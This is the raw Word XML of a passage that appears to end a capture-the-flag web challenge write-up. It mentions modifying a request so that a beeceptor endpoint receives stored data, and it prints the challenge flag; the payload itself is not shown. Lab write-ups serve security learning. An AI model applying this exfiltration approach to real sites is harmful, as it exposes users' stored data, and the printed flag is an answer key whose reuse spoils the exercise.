          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>flag=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006206FA">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Unauthorised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006206FA">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> which means it may be stored in local. Modify the request as the following shows and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>beeceptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5C4D8B" w14:textId="249058E2" w:rsidR="006206FA" w:rsidRDefault="006206FA" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>flag=FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Mmm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>,_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>aren't_cookies_just_the_best</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E2C50" w14:textId="3F916E04" w:rsidR="005E5D7E" w:rsidRDefault="005E5D7E" w:rsidP="006206FA">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E5D7E">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49366732" wp14:editId="2E5288DB">
            <wp:extent cx="5015620" cy="1954808"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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5043565" cy="1965700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5A8DA6" w14:textId="73225E2E" w:rsidR="002932C0" w:rsidRPr="008733D6" w:rsidRDefault="006206FA" w:rsidP="005525C1">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006206FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="583D1512" wp14:editId="59FBB51A">
            <wp:extent cx="2915216" cy="1063602"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="38" name="Picture 3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with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3019221" cy="1101548"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002932C0" w:rsidRPr="008733D6">
      <w:footerReference w:type="default" r:id="rId29"/>
      <w:footerReference w:type="first" r:id="rId3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9974A" w14:textId="77777777" w:rsidR="00484EAB" w:rsidRDefault="00484EAB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04EA4F0E" w14:textId="77777777" w:rsidR="00484EAB" w:rsidRDefault="00484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DCF67" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A37FA5">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A37FA5">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C5D7" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F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0FE28" w14:textId="77777777" w:rsidR="00484EAB" w:rsidRDefault="00484EAB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B41154B" w14:textId="77777777" w:rsidR="00484EAB" w:rsidRDefault="00484E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DF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3460A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3398"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25D4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729"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9E0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13CB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="202A3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D4500"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B25E7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80091B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC0C26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0F70C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5134A986"/>
    <w:lvl w:ilvl="0" w:tplc="8EDE427E">
      <w:start w:val="1"/>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690A08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80C69174"/>
    <w:lvl w:ilvl="0" w:tplc="6D5012B8">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FF43A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4956DA76"/>
    <w:lvl w:ilvl="0" w:tplc="9A9CC5F8">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353CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8F4E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F27A3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7882AF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7A4CF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0ADCDEE4"/>
    <w:lvl w:ilvl="0" w:tplc="ACAE0452">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256E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BBA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CC6AFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C186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0D393B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A06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718063">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="839809699">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="639503811">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2026128722">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="467404549">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1923685979">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="688721731">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="762385407">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="511602771">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1927960952">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1154570201">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="713234618">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1536389675">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1750468579">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="270402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2F8"/>
    <w:rsid w:val="00047197"/>
    <w:rsid w:val="00064647"/>
    <w:rsid w:val="0006480B"/>
    <w:rsid w:val="00084D97"/>
    <w:rsid w:val="00090CE3"/>
    <w:rsid w:val="000A16B1"/>
    <w:rsid w:val="000A62F3"/>
    <w:rsid w:val="000D068D"/>
    <w:rsid w:val="0010335B"/>
    <w:rsid w:val="0013338C"/>
    <w:rsid w:val="0016107B"/>
    <w:rsid w:val="001A7676"/>
    <w:rsid w:val="001F5964"/>
    <w:rsid w:val="00205DE5"/>
    <w:rsid w:val="002837A8"/>
    <w:rsid w:val="002932C0"/>
    <w:rsid w:val="002A2C2D"/>
    <w:rsid w:val="002B66B8"/>
    <w:rsid w:val="002E2C74"/>
    <w:rsid w:val="00310564"/>
    <w:rsid w:val="003665FC"/>
    <w:rsid w:val="0039378A"/>
    <w:rsid w:val="00394AE3"/>
    <w:rsid w:val="003F5898"/>
    <w:rsid w:val="00484EAB"/>
    <w:rsid w:val="004D33DD"/>
    <w:rsid w:val="004E5CF7"/>
    <w:rsid w:val="005145C3"/>
    <w:rsid w:val="005305D8"/>
    <w:rsid w:val="00547270"/>
    <w:rsid w:val="005525C1"/>
    <w:rsid w:val="005E1636"/>
    <w:rsid w:val="005E42C9"/>
    <w:rsid w:val="005E5D7E"/>
    <w:rsid w:val="006206FA"/>
    <w:rsid w:val="0063656F"/>
    <w:rsid w:val="00676B18"/>
    <w:rsid w:val="006D6392"/>
    <w:rsid w:val="006E0E0B"/>
    <w:rsid w:val="006F30A5"/>
    <w:rsid w:val="00701810"/>
    <w:rsid w:val="007242A5"/>
    <w:rsid w:val="007311D4"/>
    <w:rsid w:val="00735C24"/>
    <w:rsid w:val="007444DA"/>
    <w:rsid w:val="00745D71"/>
    <w:rsid w:val="0075166B"/>
    <w:rsid w:val="00783DC4"/>
    <w:rsid w:val="00847039"/>
    <w:rsid w:val="00851350"/>
    <w:rsid w:val="00857B1F"/>
    <w:rsid w:val="008733D6"/>
    <w:rsid w:val="008D136B"/>
    <w:rsid w:val="00900598"/>
    <w:rsid w:val="00926510"/>
    <w:rsid w:val="009352A1"/>
    <w:rsid w:val="009713C1"/>
    <w:rsid w:val="00977172"/>
    <w:rsid w:val="009A666E"/>
    <w:rsid w:val="009A7406"/>
    <w:rsid w:val="009B42F8"/>
    <w:rsid w:val="009C624B"/>
    <w:rsid w:val="00A210A2"/>
    <w:rsid w:val="00A37FA5"/>
    <w:rsid w:val="00A440DD"/>
    <w:rsid w:val="00A634C1"/>
    <w:rsid w:val="00A67A94"/>
    <w:rsid w:val="00A708C7"/>
    <w:rsid w:val="00AA33EF"/>
    <w:rsid w:val="00B01025"/>
    <w:rsid w:val="00B60F2B"/>
    <w:rsid w:val="00BF0435"/>
    <w:rsid w:val="00C20A45"/>
    <w:rsid w:val="00C6423F"/>
    <w:rsid w:val="00C80541"/>
    <w:rsid w:val="00C9432E"/>
    <w:rsid w:val="00D83603"/>
    <w:rsid w:val="00DD3528"/>
    <w:rsid w:val="00E14F36"/>
    <w:rsid w:val="00E227D1"/>
    <w:rsid w:val="00E31533"/>
    <w:rsid w:val="00E42A01"/>
    <w:rsid w:val="00EC262E"/>
    <w:rsid w:val="00ED7F69"/>
    <w:rsid w:val="00EF5F55"/>
    <w:rsid w:val="00F01E92"/>
    <w:rsid w:val="00F55CD0"/>
    <w:rsid w:val="00F73763"/>
    <w:rsid w:val="00FA777C"/>
    <w:rsid w:val="00FE5DC5"/>
    <w:rsid w:val="00FE7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BF733"/>
  <w15:docId w15:val="{34C92875-D81C-4643-A70C-44DE4383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00598"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00900598"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00900598"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00900598"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="md-end-block">
    <w:name w:val="md-end-block"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00E315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plain">
    <w:name w:val="md-plain"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E31533"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E3153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4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444DA"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-operator">
    <w:name w:val="cm-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable">
    <w:name w:val="cm-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-keyword">
    <w:name w:val="cm-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable-2">
    <w:name w:val="cm-variable-2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
    <w:name w:val="cm-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-number">
    <w:name w:val="cm-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-builtin">
    <w:name w:val="cm-builtin"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-atom">
    <w:name w:val="cm-atom"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007444DA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-comment">
    <w:name w:val="cm-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00851350"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-property">
    <w:name w:val="cm-property"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006206FA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string-2">
    <w:name w:val="cm-string-2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006206FA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-def">
    <w:name w:val="cm-def"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006206FA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002B66B8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0075166B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0075166B"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00205D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2271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="712996461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="823426460">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="987708618">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1201087120">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1402680436">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1554386575">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1562866257">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1693871101">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1781562013">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1833788107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1890923195">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2071535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mozilla.org/en-US/docs/Web/API/XMLHttpRequest/readystatechange_even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350</TotalTime>
  <Pages>1</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Jiahao Chen</cp:lastModifiedBy>
  <cp:revision>71</cp:revision>
  <cp:lastPrinted>2023-03-30T07:48:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-29T14:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-30T07:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>